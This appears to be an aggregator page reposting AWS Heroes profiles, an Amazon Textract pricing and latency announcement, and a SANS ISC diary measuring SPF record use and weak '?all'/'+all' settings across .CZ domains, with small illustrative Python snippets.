Luc van Donkersgoed – Utrecht, The Netherlands

DevTools Hero Luc van Donkersgoed is a geek at heart, solutions architect, software developer, and entrepreneur. He is fascinated by bleeding edge technology. When he is not designing and building powerful applications on AWS, you can probably find Luc sharing knowledge in blogs, articles, videos, conferences, training sessions, and Twitter. He has authored a 16-session AWS Solutions Architect Professional course, presented on various topics including how the AWS CDK will enable a new generation of serverless developers, appeared on the AWS Developers Podcast, and he maintains the AWS Blogs Twitter Bot.

Rick Hwang – Taipei City, Taiwan

Community Hero Rick Hwang is a cloud and infrastructure architect at 91APP in Taiwan. His passion to educate developers has been demonstrated both internally as an annual AWS training project leader, and externally as a community owner of SRE Taiwan. Rick started SRE Taiwan on his own and has recruited over 3,600 members over the past 4 years via peer-to-peer interactions, constantly sharing content, and hosting annual study group meetups. Rick enjoys helping people increase their understanding of AWS and the cloud in general.

Rosius Ndimofor – Douala, Cameroon

Serverless Hero Rosius Ndimofor is a software developer at Serverless Guru. He has been building desktop, web, and mobile apps for various customers for 8 years. In 2020, Rosius was introduced to AWS by his friend, was immediately hooked, and started learning as much as he could about building AWS serverless applications. You can find Rosius speaking at local monthly AWS meetup events, or his forte: building serverless web or mobile applications and documenting the entire process on his blog.

Setia Budi – Bandung, Indonesia

Community Hero Setia Budi is an academic from Indonesia. He runs a YouTube channel named Indonesia Belajar, which provides learning materials related to computer science and cloud computing (delivered in Indonesian language). His passion for the AWS community is also expressed by delivering talks in AWS DevAx Connect, and he is actively building a range of learning materials related to AWS services, and streaming weekly live sessions featuring experts from AWS to talk about cloud computing.

Vinicius Caridá – São Paulo, Brazil

Machine Learning Hero Vinicius Caridá (Vini) is a Computer Engineer who believes tech, data, & AI can impact people for a fairer and more evolved world. He loves to share his knowledge on AI, NLP, and MLOps on social media, on his YouTube channel, and at various meetups such as AWS User Group São Paulo where he is a community leader. Vini is also a community leader at TensorFlow São Paulo, an open source machine learning framework. He regularly participates in conferences and writes articles for different audiences (academic, scientific, technical), and different maturity levels (beginner, intermediate, and advanced).

If you’d like to learn more about the new Heroes, or connect with a Hero near you, please visit the AWS Heroes website or browse the AWS Heroes Content Library.

Ross;

Amazon Textract Updates: Up to 32% Price Reduction in 8 AWS Regions and Up to 50% Reduction in Asynchronous Job Processing Times

This post was originally published on this site

Introduced at AWS re:Invent 2018, Amazon Textract is a machine learning service that automatically extracts text, handwriting, and data from scanned documents, going beyond simple optical character recognition (OCR) to identify, understand, and extract data from forms and tables.

In the past few months, we introduced specialized support for processing invoices and receipts and enhanced the quality of the underlying computer vision models that power extraction of handwritten text, forms, and tables with printed text support for English, Spanish, German, Italian, Portuguese, and French.

Third-party auditors assess the security and compliance of Amazon Textract as part of multiple AWS compliance programs. We also added IRAP compliance support and achieved US FedRAMP authorization to add to the existing list such as HIPAA, PCI DSS, ISO SCO, and MTCS.

Customers use Amazon Textract to automate critical business process workflows (for example, in claims and tax form processing, loan applications, and accounts payable). It can reduce human review time, improve accuracy, lower costs, and accelerate the pace of innovation on a global scale. At the same time, Textract customers told us that we could be doing even more to reduce costs and improve latency.

Today we are excited to announce two major updates to Amazon Textract:

  • Up to 32 percent price reduction in 8 AWS Regions to help global customers save even more with Textract.
  • Up to 50 percent reduction in end-to-end job processing times for Textract’s asynchronous operations worldwide.

Up to 32% price reduction in 8 AWS Regions
We are pleased to announce an up to 32 percent price reduction in eight AWS Regions: Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Canada (Central), Europe (Frankfurt), Europe (London), and Europe (Paris).

The API pricing for DetectDocumentText (OCR) and AnalyzeDocument (both forms and tables) in these AWS Regions is now the same as the US East (N. Virginia) Region pricing. Customers in those identified Regions will see a 9-32 percent reduction in API pricing.

Before the price reduction, a customer’s usage of the DetectDocumentText and AnalyzeDocument APIs would have been billed at different rates, by Region, for their usage tier. That customer will now be billed at the same rate, no matter from which AWS commercial Region Textract is being called.

AWS Region                  DetectDocumentText API         AnalyzeDocument API (forms + tables)
                            Old      New     Reduction     Old       New      Reduction
Asia Pacific (Mumbai)       $1.830   $1.50   18%           $79.30    $65.00   18%
Asia Pacific (Seoul)        $1.845   $1.50   19%           $79.95    $65.00   19%
Asia Pacific (Singapore)    $2.200   $1.50   32%           $95.00    $65.00   32%
Asia Pacific (Sydney)       $1.950   $1.50   23%           $84.50    $65.00   23%
Canada (Central)            $1.655   $1.50   9%            $72.15    $65.00   10%
Europe (Frankfurt)          $1.875   $1.50   20%           $81.25    $65.00   20%
Europe (London)             $1.750   $1.50   14%           $75.00    $65.00   13%
Europe (Paris)              $1.755   $1.50   15%           $76.05    $65.00   15%

This table shows two examples of effective price per 1,000 pages for processing the first 1 million monthly pages before and after this price reduction. Customers with usage above the 1 million monthly pages tier will also see a similar reduction in prices, the details of which can be found on the Amazon Textract pricing page.
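
The reduction percentages in the table are easy to sanity-check. This short calculation, using three of the old first-tier DetectDocumentText prices from the table and the new $1.50 price, reproduces them:

```python
# Old first-tier prices per 1,000 pages from the table; the new price in
# every listed Region now matches US East (N. Virginia): $1.50 for OCR.
old_ocr = {"Asia Pacific (Mumbai)": 1.830,
           "Asia Pacific (Singapore)": 2.200,
           "Europe (London)": 1.750}
new_ocr = 1.50

for region, old in old_ocr.items():
    reduction = round((old - new_ocr) / old * 100)
    print(f"{region}: {reduction}% reduction")  # 18%, 32%, 14%
```

The same formula applied to the AnalyzeDocument column (against the new $65.00 price) yields the reductions shown on the right-hand side of the table.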

The new pricing goes into effect on September 1, 2021. It will be applied to your bill automatically. This pricing change does not apply to the Europe (Ireland), US-based commercial Regions, and US GovCloud Regions. There is no change to the pricing for the recently launched AnalyzeExpense API for invoices and receipts.

As part of the AWS Free Tier, you can get started with Amazon Textract for free. The Free Tier lasts 3 months and new AWS customers can analyze up to 1,000 pages per month using the Detect Document Text API and up to 100 pages per month using the Analyze Document API or Analyze Expense API.

Up to 50% reduction in end-to-end job processing times
Customers can invoke Textract synchronously (on single-page documents) and asynchronously (on multi-page documents) for detecting printed and handwritten lines and words (via the DetectDocumentText API) as well as for forms and tables extraction (via the AnalyzeDocument API). We see that the vast majority of customers invoke Textract asynchronously today for at-scale processing of their document pipeline.

Based on customer feedback, we have made a number of enhancements to Textract’s asynchronous API operations that reduce the end-to-end job processing times experienced by customers worldwide by as much as 50 percent. The lower the processing time, the faster customers are able to process their documents, achieve scale, and improve their overall productivity.

To learn more about Amazon Textract, see this tutorial for extracting text and structured data from a document, this code sample on GitHub, Amazon Textract documentation, and blog posts about Amazon Textract on the AWS Machine Learning Blog.

Channy

There may be (many) more SPF records than we might expect, (Wed, Aug 25th)

This post was originally published on this site

The Sender Policy Framework (SPF[1]) is a simple but fairly powerful mechanism that may be used (ideally in connection with DKIM[2] and DMARC[3]) to combat phishing to some degree. Basically, it allows a domain name owner to publish a special DNS TXT record containing a list of servers that are authorized to send e-mails for that domain. The existence and contents of this record are automatically checked by modern e-mail servers whenever they receive an e-mail that appears to come from a certain domain, and if the sending server is not on the “approved list” for that domain, the message may be dealt with in a special way – for example, marked as potentially fraudulent, moved to a quarantine folder, or even dropped entirely.

The structure of an SPF record is quite simple – after an SPF version specification (v=spf1) one may list “directives”. These are specifications of IP addresses, domain names or other DNS records that identify valid sources of e-mail for the domain (they may be preceded by a + symbol or – in some instances – an “include” keyword). After the list of “approved senders”, the record should end with a directive specifying that no other servers may send e-mail for that domain. This may be done with the ~all (so-called “softfail”) or -all directives, which indicate that no other servers are approved for sending e-mail for that domain.

One might end an SPF record using a “neutral” ?all directive, which would basically mean “an e-mail coming from all other sources, than the ones explicitly listed, should be treated as if this SPF record didn’t exist” (which can be useful for initial deployment or troubleshooting, but defeats the purpose of SPF in any other case, at least when it’s used on its own without DMARC). An SPF record might even end using a +all directive, which would specify that all sources that were not mentioned are explicitly permitted to send messages for the domain. Setting such an SPF record would however be completely nonsensical, since it would basically allow all servers everywhere to legitimately send e-mail on behalf of the domain in question.

A typical SPF record might therefore look like this one, which is currently set for wikimedia.org:

v=spf1 ip4:91.198.174.0/24 ip4:208.80.152.0/22 ip6:2620:0:860::/46 include:_spf.google.com ip4:74.121.51.111 ~all

Some SPF records may include additional mechanisms and be slightly more complex, but for our purposes, the form mentioned above (a list of “valid” senders followed by -all or ~all directive) is quite sufficient.

What’s important to note is that if a record doesn’t specify how e-mail from “all” other senders should be treated (i.e. it doesn’t end in ~all or -all directive), then a ?all directive is implicitly added to its end. This means that a record that is not properly terminated makes very little impact, since it only specifies “allowed” senders, but does not specify that any other sender is not allowed to send e-mails on behalf of the domain.

Although it may seem strange, given what we just mentioned, it is well known that a not-insignificant number of SPF records do explicitly end with the ?all directive, which is something that phishing authors sometimes use to their advantage[4,5].
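
Checking which “all” directive a record ends with takes only a few lines. This sketch (the spf_all_qualifier helper is mine, not a standard API, and it only inspects the trailing mechanism) classifies the wikimedia.org record shown above:

```python
def spf_all_qualifier(record):
    # Return the qualifier of the trailing "all" mechanism, or None if
    # the record doesn't end with one (in which case "?all" is implied).
    last = record.split()[-1]
    if last.endswith("all") and len(last) <= 4:
        qualifier = last[:-3] or "+"   # a bare "all" means "+all" per RFC 7208
        return qualifier + "all"
    return None

record = ("v=spf1 ip4:91.198.174.0/24 ip4:208.80.152.0/22 "
          "ip6:2620:0:860::/46 include:_spf.google.com ip4:74.121.51.111 ~all")
print(spf_all_qualifier(record))  # → ~all (softfail)
```

A record that returns None here is effectively terminated by an implicit ?all and offers little protection on its own.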

At this point you might reasonably ask what is meant by “a not insignificant number of records”.

Although I can’t offer you hard data for the entire internet, I am in the position to do so for a small part of it – specifically for the .CZ TLD.

The Czech national domain name registry, CZ.NIC (which also operates the Czech National CSIRT), recently created a tool that allows them to scan (literally) all of the domains in the CZ ccTLD space for arbitrary “properties”, such as supported TLS cipher suites or specific DNS records. And since “misconfigured” SPF records are a pet peeve of mine, ever since I learned about the existence of this tool, I have been bothering a colleague from the National CSIRT, @e2rd_rejthar, with requests for data for SPF-related DNS records. This week, he was kind enough to send them to me, which means I can now share with you fairly exact numbers related to SPF use (though – admittedly – only in a very small part of the internet).

As you may see from the chart, there were many more SPF records than one might have expected (or, at least, that I would have). There were 1,401,785 .CZ domains registered on the day of the scan (August 19th) and these domains used 1,101,489 SPF records in total. Since one may “chain” multiple SPF records for one domain, this does not necessarily mean that over 78.5 % of all CZ domains had SPF record set, but even so, the number is still very high.

Correction – after checking with my colleague, the 1.1M really refers to the number of individual domains with SPFv1 records set, which means that 78.5 % of .cz domains really do have an SPF record.

What’s also surprising is the comparatively small number of “less than optimally set” records. The ?all directive was present in only 35,270 records (~3.2 %) and the “whoever included this should have known better” +all directive was present in only 558 records.

Although the numbers for domains in the .cz TLD are most likely not representative of the wider internet, who knows – maybe there are significantly more SPF records overall than we might expect and perhaps the issue with ?all directives isn’t as commonplace as it used to be… We can only hope.

[1] https://datatracker.ietf.org/doc/html/rfc7208
[2] https://datatracker.ietf.org/doc/html/rfc6376
[3] https://datatracker.ietf.org/doc/html/rfc7489
[4] https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/
[5] https://isc.sans.edu/forums/diary/Agent+Tesla+delivered+by+the+same+phishing+campaign+for+over+a+year/26062/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.